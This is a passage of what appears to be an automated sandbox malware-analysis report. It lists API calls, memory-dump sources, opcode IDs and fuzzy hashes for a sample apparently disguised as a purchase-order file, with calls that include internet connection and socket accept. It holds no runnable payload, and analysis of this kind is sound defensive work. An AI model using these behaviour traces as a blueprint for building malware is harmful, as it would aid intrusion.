                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                      • Opcode ID: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
                                                                                                                                                                                                      • Instruction ID: 469bf99c801f96624eea77c586d463107e8b0cfafe3e1a68cffd4768a2f07c69
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A74119B0E442486AFF208F6588067FEBBB59B45712F04015BF4C1A22C1C7BC9E85D76D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00AF354C
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF35D5
                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AF35E7
                                                                                                                                                                                                      • __freea.LIBCMT ref: 00AF35F0
                                                                                                                                                                                                        • Part of subcall function 00AF32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AF332C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                      • Opcode ID: 2e72f8407c7ecd12aa801d038b57a94a2790a4ea1af08e271be039e5439aa81b
                                                                                                                                                                                                      • Instruction ID: 36ebaf2d8c68e7132cea25c191c297b77b0d9b8e3e30f60157b515e2d49fef9f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e72f8407c7ecd12aa801d038b57a94a2790a4ea1af08e271be039e5439aa81b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21319A72A0020AAFDF259FA4DC85DBF7BA5EF80310B054228F904D7250EB35DE95CB90
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0044E742
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0044E768
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0044E78D
                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0044E7B9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                      • Opcode ID: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
                                                                                                                                                                                                      • Instruction ID: a2bdcbcb23e6067ac7ad5f975947d6cfe77527ed2825ba135b237677522510d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B413C35600610DFCF11EF26C54494DBBE5BF59724B09849AED46AB3A2CB78FC40CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0046B5D1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                      • Opcode ID: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
                                                                                                                                                                                                      • Instruction ID: c86e180ac39fdd8a69f0b1340c4036a34fcc01a06aab4df10420dcd6b6513ddd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531D034601208BBEB208A19CC84FEA3765EB06354F544517FA12D62F1F738A9C08BDF
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0046D807
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0046D87D
                                                                                                                                                                                                      • PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0046D8FE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                      • Opcode ID: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
                                                                                                                                                                                                      • Instruction ID: 5fa1f60125daaa5e84eea42d34aebc29e8453dd218e4da573cb7e242a531e712
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418C70F00218DFCB11EF59C888F697BB5FB45314F1881AAE4249B261E334E945CB4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00434038
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00434066
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434094
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004340CA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
                                                                                                                                                                                                      • Instruction ID: 18c0360fd1569c977bfde1c2717b0e17dfe99921f0502833c073a699be0c4c70
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5531D230700216AFDB259F35C844BEB7BB5BF89320F15542AE661872E0E735E891DB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0046F211
                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047E4C0,?,?,?,?,?), ref: 0046F226
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0046F270
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047E4C0,?,?,?), ref: 0046F2A6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                      • Opcode ID: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
                                                                                                                                                                                                      • Instruction ID: 421acbc8388f5fa8e11c8d5781fd18043b8c951ec840c19c7752c1421d3c3654
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0521F238601018BFCB158F95E868EEF7BB5EF0A310F0440AAF945472A2E3399950DF95
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00454358
                                                                                                                                                                                                        • Part of subcall function 004543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
                                                                                                                                                                                                        • Part of subcall function 004543E2: InternetCloseHandle.WININET(00000000), ref: 0045449E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1463438336-0
                                                                                                                                                                                                      • Opcode ID: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
                                                                                                                                                                                                      • Instruction ID: f2f30b271a6af74a9d7b134cde8f3afa5d8ff7ebb5d92f8591c0153e2dca6813
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C521D431701601BBEB119F60DC00F7BB7A9FF8471AF00402FBE159B6A1D7759869A798
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00458AE0
                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458AF2
                                                                                                                                                                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458AFF
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B16
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 385091864-0
                                                                                                                                                                                                      • Opcode ID: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
                                                                                                                                                                                                      • Instruction ID: cec81d560cfc8959454608d08dcc177ad0e4f6f8aca8df67afe39ee5a7d451b4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E21C372A011249FC7109F69C885A9EBBECEF49310F00416EF849E7291DB789A458F94
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00468AA6
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468AC0
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468ACE
                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00468ADC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                      • Opcode ID: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
                                                                                                                                                                                                      • Instruction ID: 3b2d1d0a209467fe1eaa344d409eb254f997c443b6415a419c9b2e187924ca12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3811E131606011AFDB04AB54CC05FBE7799AF85324F14422EFC16D72E2DBB8AC008799
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00441E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441E77
                                                                                                                                                                                                        • Part of subcall function 00441E68: lstrcpyW.KERNEL32(00000000,?,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00441E9D
                                                                                                                                                                                                        • Part of subcall function 00441E68: lstrcmpiW.KERNEL32(00000000,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441ECE
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AD4
                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AFA
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440B2E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                      • Opcode ID: 0fe415cb91b5ec623ea961ea0cfd80b63da84bf6d69d8f0da9c5f2c7a7227f82
                                                                                                                                                                                                      • Instruction ID: c7304db2e455f905d58f141a894c6769a3b5098f9c982885bc3ade38f0d3ce7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe415cb91b5ec623ea961ea0cfd80b63da84bf6d69d8f0da9c5f2c7a7227f82
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95110636200344AFEB209F64CC05D7A77A8FF45354B80412FE905CB2A0EB75E851C7A8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _free.LIBCMT ref: 00432FB5
                                                                                                                                                                                                        • Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
                                                                                                                                                                                                        • Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
                                                                                                                                                                                                        • Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                      • Opcode ID: 58748fedd27582319160605c497609f39d126aafe53aaf3fe275afe370e88150
                                                                                                                                                                                                      • Instruction ID: 49a6a1f19b535ba8fc49ed021f10ce5f4a0a1db8662e9c22c6828818e7789cec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58748fedd27582319160605c497609f39d126aafe53aaf3fe275afe370e88150
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5113D31609221ABCB313F71BC0462A3BA4AF18369F60592FF809C6261CB7CC840979C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004405AC
                                                                                                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004405C7
                                                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004405DD
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00440632
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
